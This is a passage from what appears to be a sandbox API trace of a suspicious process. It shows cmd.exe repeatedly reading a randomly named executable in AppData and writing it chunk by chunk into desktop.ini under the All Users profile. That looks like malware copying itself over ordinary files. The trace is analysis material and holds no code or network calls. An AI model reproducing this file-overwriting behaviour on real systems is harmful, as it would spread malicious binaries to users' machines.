_wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0177.935] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0177.935] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\defaul~1\\desktop.ini")) returned 0xffffffff [0177.935] GetLastError () returned 0x2 [0177.935] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x28376c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28376c) returned 0xffffffff [0177.935] GetLastError () returned 0x2 [0177.935] _get_osfhandle (_FileHandle=2) returned 0xb [0177.935] GetFileType (hFile=0xb) returned 0x2 [0177.936] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0177.936] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14ed98 | out: lpMode=0x14ed98) returned 1 [0177.936] _get_osfhandle (_FileHandle=2) returned 0xb [0177.936] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x14edcc | out: lpConsoleScreenBufferInfo=0x14edcc) returned 1 [0177.936] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0177.937] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.937] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.937] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.937] GetFileType (hFile=0x7) returned 0x2 [0177.937] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0177.937] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f4bc | out: lpMode=0x14f4bc) returned 1 [0177.937] _dup (_FileHandle=1) returned 3 [0177.937] _close (_FileHandle=1) returned 0 [0177.937] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini", _String2="con") returned -53 [0177.937] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\defaul~1\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x14f48c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0177.938] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0177.938] GetConsoleTitleW (in: lpConsoleTitle=0x14f2bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0177.938] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x14ee20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ee20) returned 0x281488 [0177.938] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0177.938] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0177.938] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0177.938] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14dd2c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0177.938] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0177.938] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.938] GetFileType (hFile=0x58) returned 0x1 [0177.938] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.938] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x14dd84 | out: lpFileSizeHigh=0x14dd84*=0x0) returned 0x7d600 [0177.938] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.938] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0177.938] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.938] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.939] GetFileType (hFile=0x50) returned 0x1 [0177.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.939] GetFileType (hFile=0x50) returned 0x1 [0177.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.939] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.940] GetFileType (hFile=0x50) returned 0x1 [0177.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.940] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.941] GetFileType (hFile=0x50) returned 0x1 [0177.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.941] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.941] GetFileType (hFile=0x50) returned 0x1 [0177.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.941] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.941] GetFileType (hFile=0x50) returned 0x1 [0177.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.941] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.941] GetFileType (hFile=0x50) returned 0x1 [0177.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.941] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.941] GetFileType (hFile=0x50) returned 0x1 [0177.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.941] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.941] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.941] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.941] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.941] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.941] GetFileType (hFile=0x50) returned 0x1 [0177.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.941] GetFileType (hFile=0x50) returned 0x1 [0177.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.942] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.942] GetFileType (hFile=0x50) returned 0x1 [0177.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.942] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.942] GetFileType (hFile=0x50) returned 0x1 [0177.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.942] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.942] GetFileType (hFile=0x50) returned 0x1 [0177.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.942] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.942] GetFileType (hFile=0x50) returned 0x1 [0177.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.942] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.942] GetFileType (hFile=0x50) returned 0x1 [0177.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.942] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.942] GetFileType (hFile=0x50) returned 0x1 [0177.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.942] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.942] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.942] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.943] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.943] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.943] GetFileType (hFile=0x50) returned 0x1 [0177.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.943] GetFileType (hFile=0x50) returned 0x1 [0177.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.943] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.943] GetFileType (hFile=0x50) returned 0x1 [0177.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.943] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.943] GetFileType (hFile=0x50) returned 0x1 [0177.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.943] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.943] GetFileType (hFile=0x50) returned 0x1 [0177.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.943] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.943] GetFileType (hFile=0x50) returned 0x1 [0177.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.943] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.943] GetFileType (hFile=0x50) returned 0x1 [0177.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.943] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.943] GetFileType (hFile=0x50) returned 0x1 [0177.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.943] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.944] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.944] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.944] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.944] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.944] GetFileType (hFile=0x50) returned 0x1 [0177.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.944] GetFileType (hFile=0x50) returned 0x1 [0177.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.944] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.944] GetFileType (hFile=0x50) returned 0x1 [0177.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.944] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.944] GetFileType (hFile=0x50) returned 0x1 [0177.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.944] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.944] GetFileType (hFile=0x50) returned 0x1 [0177.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.944] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.944] GetFileType (hFile=0x50) returned 0x1 [0177.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.944] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.944] GetFileType (hFile=0x50) returned 0x1 [0177.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.944] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.944] GetFileType (hFile=0x50) returned 0x1 [0177.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.944] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.945] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.945] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.945] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.945] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.945] GetFileType (hFile=0x50) returned 0x1 [0177.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.945] GetFileType (hFile=0x50) returned 0x1 [0177.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.945] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.945] GetFileType (hFile=0x50) returned 0x1 [0177.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.945] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.945] GetFileType (hFile=0x50) returned 0x1 [0177.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.945] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.945] GetFileType (hFile=0x50) returned 0x1 [0177.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.945] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.945] GetFileType (hFile=0x50) returned 0x1 [0177.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.945] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.946] GetFileType (hFile=0x50) returned 0x1 [0177.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.946] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.946] GetFileType (hFile=0x50) returned 0x1 [0177.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.946] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.946] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.946] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.946] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.946] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.946] GetFileType (hFile=0x50) returned 0x1 [0177.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.946] GetFileType (hFile=0x50) returned 0x1 [0177.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.946] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.946] GetFileType (hFile=0x50) returned 0x1 [0177.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.946] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.946] GetFileType (hFile=0x50) returned 0x1 [0177.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.946] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.946] GetFileType (hFile=0x50) returned 0x1 [0177.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.946] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.946] GetFileType (hFile=0x50) returned 0x1 [0177.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.946] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.947] GetFileType (hFile=0x50) returned 0x1 [0177.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.947] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.947] GetFileType (hFile=0x50) returned 0x1 [0177.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.947] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.947] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.947] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.947] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.947] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.947] GetFileType (hFile=0x50) returned 0x1 [0177.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.947] GetFileType (hFile=0x50) returned 0x1 [0177.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.947] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, 